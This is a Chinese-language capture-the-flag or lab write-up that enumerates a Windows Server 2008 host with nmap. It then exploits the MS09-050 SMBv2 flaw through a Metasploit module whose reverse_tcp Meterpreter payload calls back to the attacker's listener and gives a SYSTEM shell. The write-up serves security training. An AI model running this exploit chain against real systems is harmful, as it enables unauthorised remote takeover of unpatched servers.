概括
该机器通过旧版本的 Microsoft Windows SMB 服务器中的漏洞进行利用,该漏洞是通过对网络服务执行指纹扫描发现的。
枚举
nmap扫描
我们首先运行nmap扫描:
kali@kali~# nmap -p- 192.168.103.40
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 20:53 EST
Nmap scan report for 192.168.103.40
Host is up (0.066s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 2016.34 seconds
这里值得注意的主要服务是 DNS 服务器、SMB 服务器和 RDP 服务器。
SMB
SMB 服务的进一步枚举揭示了有关主机的更多详细信息:
kali@kali~# nmap -sC -sV -p139,445 192.168.103.40
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 21:37 EST
Nmap scan report for 192.168.103.40
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
Host script results:
|_clock-skew: mean: 2h39m59s, deviation: 4h37m08s, median: 0s
|_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:bf:f4:a4 (VMware)
| smb-os-discovery:
| OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: internal
| NetBIOS computer name: INTERNAL\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-16T18:37:16-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-17T02:37:15
|_ start_date: 2020-08-13T03:45:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.57 seconds
这里的主要要点是,服务器当前运行的是 Windows Server 2008 Standard 6001 Service Pack 1,如果未修补,SMB 服务中可能存在漏洞。
Nmap扫描漏洞
使用 Nmap 的内置脚本引擎,我们可以针对服务器运行一些脚本来检测任何潜在的漏洞:
kali@kali~# nmap -script=smb-vuln\* -p445 192.168.103.40
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 21:42 EST
Nmap scan report for 192.168.103.40
Host is up (0.067s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
Nmap done: 1 IP address (1 host up) scanned in 60.92 seconds
扫描结果表明服务器可能容易受到 CVE-2009-3103 中披露的漏洞的影响。对此进行快速搜索后发现,这也称为 Microsoft 安全公告MS09-050。此漏洞有许多公开的漏洞利用,包括Metasploit 模块:
kali@kali~# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1105 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf5 > search MS09-050
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
1 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
2 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Interact with a module by name or index, for example use 2 or use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf5 >
列出的最后一个条目是针对此漏洞的利用。要获得反向 shell,我们只需输入目标的 IP 地址并运行漏洞利用程序,即可生成系统级 shell:
msf5 > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOSTS 192.168.103.40
RHOSTS => 192.168.103.40
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.49.103
LHOST => 192.168.49.103
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > show options
Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.103.40 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
WAIT 180 yes The number of seconds to wait for the attack to complete.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.49.103 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 192.168.49.103:4444
[*] 192.168.103.40:445 - Connecting to the target (192.168.103.40:445)...
[*] 192.168.103.40:445 - Sending the exploit packet (938 bytes)...
[*] 192.168.103.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (176195 bytes) to 192.168.103.40
[*] Meterpreter session 1 opened (192.168.49.103:4444 -> 192.168.103.40:49159) at 2020-12-16 22:12:54 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3484 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
hostname
internal
C:\Windows\system32>© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
